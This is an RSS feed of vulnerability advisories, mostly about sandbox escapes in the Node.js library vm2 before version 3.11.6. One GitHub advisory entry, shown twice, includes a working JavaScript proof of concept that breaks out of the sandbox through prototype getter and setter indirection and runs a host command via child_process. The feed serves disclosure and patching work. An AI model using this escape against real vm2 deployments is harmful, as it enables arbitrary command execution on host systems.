<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Fri, 02 Oct 2026 22:02:54 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-355281</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-355281</link>
      <description>EUVD-2026-355281</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-355281</guid>
    </item>
    <item>
      <title>fkie_cve-2026-47698</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-47698</link>
      <description>&lt;p&gt;vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.6, lib/bridge.js and lib/setup-sandbox.js fail to block stacked indirection through Function.prototype.call around dangerous host prototype getter and setter mutators, allowing sandbox code to sever a host intrinsic&amp;#39;s prototype chain and reach e.constructor.constructor for arbitrary host command execution. This issue is fixed in version 3.11.6.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.6, lib/bridge.js and lib/setup-sandbox.js fail to block stacked indirection through Function.prototype.call around dangerous host prototype getter and setter mutators, allowing sandbox code to sever a host intrinsic&amp;#39;s prototype chain and reach e.constructor.constructor for arbitrary host command execution. This issue is fixed in version 3.11.6.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-47698</guid>
    </item>
    <item>
      <title>GHSA-cfcw-xp6x-25gj — vm2: Sandbox Breakout Using Dangerous Host Proto Mutators</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-cfcw-xp6x-25gj</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: vm2&lt;/p&gt;
&lt;p&gt;### Summary&lt;/p&gt;
&lt;p&gt;VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.&lt;/p&gt;
&lt;p&gt;### Details&lt;/p&gt;
&lt;p&gt;The fix for https://github.com/patriksimek/vm2/security/advisories/GHSA-v6mx-mf47-r5wg is insufficient and can be bypassed by replacing `indirectcall.call(dangerousmutator, ...)` with `indirectcall.call(indirectcall, dangerousmutator, ...)` since indirect calls are not seen as dangerous.&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;```js
const {VM} = require(&amp;#34;.&amp;#34;);
const vm = new VM();
console.log(vm.run(`
const getProto = Buffer.call.call(Buffer.call, {}.__lookupGetter__, Buffer, &amp;#34;__proto__&amp;#34;);
const setProto = Buffer.call.call(Buffer.call, {}.__lookupSetter__, Buffer, &amp;#34;__proto__&amp;#34;);&lt;/p&gt;
&lt;p&gt;async function f() {
  try {
    await WebAssembly.compileStreaming();
  } catch(e) {
    Buffer.call.call(Buffer.call, setProto, Buffer.call.call(Buffer.call, getProto, e), null);
  }&lt;/p&gt;
&lt;p&gt;try {
    await WebAssembly.compileStreaming();
  } catch(e) {
    e.constructor.constructor(&amp;#34;return process&amp;#34;)().mainModule.require(&amp;#39;child_process&amp;#39;).execSync(&amp;#39;touch pwned&amp;#39;);
  }
}&lt;/p&gt;
&lt;p&gt;f();
`));
```&lt;/p&gt;
&lt;p&gt;### Impact&lt;/p&gt;
&lt;p&gt;Attackers can perform Remote Code Execution under the assumption that the attacker can run arbitrary code execution inside the context of a vm2 sandbox.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: vm2&lt;/p&gt;
&lt;p&gt;### Summary&lt;/p&gt;
&lt;p&gt;VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.&lt;/p&gt;
&lt;p&gt;### Details&lt;/p&gt;
&lt;p&gt;The fix for https://github.com/patriksimek/vm2/security/advisories/GHSA-v6mx-mf47-r5wg is insufficient and can be bypassed by replacing `indirectcall.call(dangerousmutator, ...)` with `indirectcall.call(indirectcall, dangerousmutator, ...)` since indirect calls are not seen as dangerous.&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;```js
const {VM} = require(&amp;#34;.&amp;#34;);
const vm = new VM();
console.log(vm.run(`
const getProto = Buffer.call.call(Buffer.call, {}.__lookupGetter__, Buffer, &amp;#34;__proto__&amp;#34;);
const setProto = Buffer.call.call(Buffer.call, {}.__lookupSetter__, Buffer, &amp;#34;__proto__&amp;#34;);&lt;/p&gt;
&lt;p&gt;async function f() {
  try {
    await WebAssembly.compileStreaming();
  } catch(e) {
    Buffer.call.call(Buffer.call, setProto, Buffer.call.call(Buffer.call, getProto, e), null);
  }&lt;/p&gt;
&lt;p&gt;try {
    await WebAssembly.compileStreaming();
  } catch(e) {
    e.constructor.constructor(&amp;#34;return process&amp;#34;)().mainModule.require(&amp;#39;child_process&amp;#39;).execSync(&amp;#39;touch pwned&amp;#39;);
  }
}&lt;/p&gt;
&lt;p&gt;f();
`));
```&lt;/p&gt;
&lt;p&gt;### Impact&lt;/p&gt;
&lt;p&gt;Attackers can perform Remote Code Execution under the assumption that the attacker can run arbitrary code execution inside the context of a vm2 sandbox.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-cfcw-xp6x-25gj</guid>
    </item>
    <item>
      <title>WID-SEC-W-2026-2865 — vm2: Mehrere Schwachstellen</title>
      <link>https://cve.radiocsirt.org/vuln/wid-sec-w-2026-2865</link>
      <description>&lt;p&gt;Ein Angreifer kann mehrere Schwachstellen in vm2 ausnutzen, um einen Denial of Service Angriff durchzuführen, um beliebigen Programmcode auszuführen, um Informationen offenzulegen, und um Daten zu manipulieren.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Ein Angreifer kann mehrere Schwachstellen in vm2 ausnutzen, um einen Denial of Service Angriff durchzuführen, um beliebigen Programmcode auszuführen, um Informationen offenzulegen, und um Daten zu manipulieren.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/wid-sec-w-2026-2865</guid>
    </item>
  </channel>
</rss>
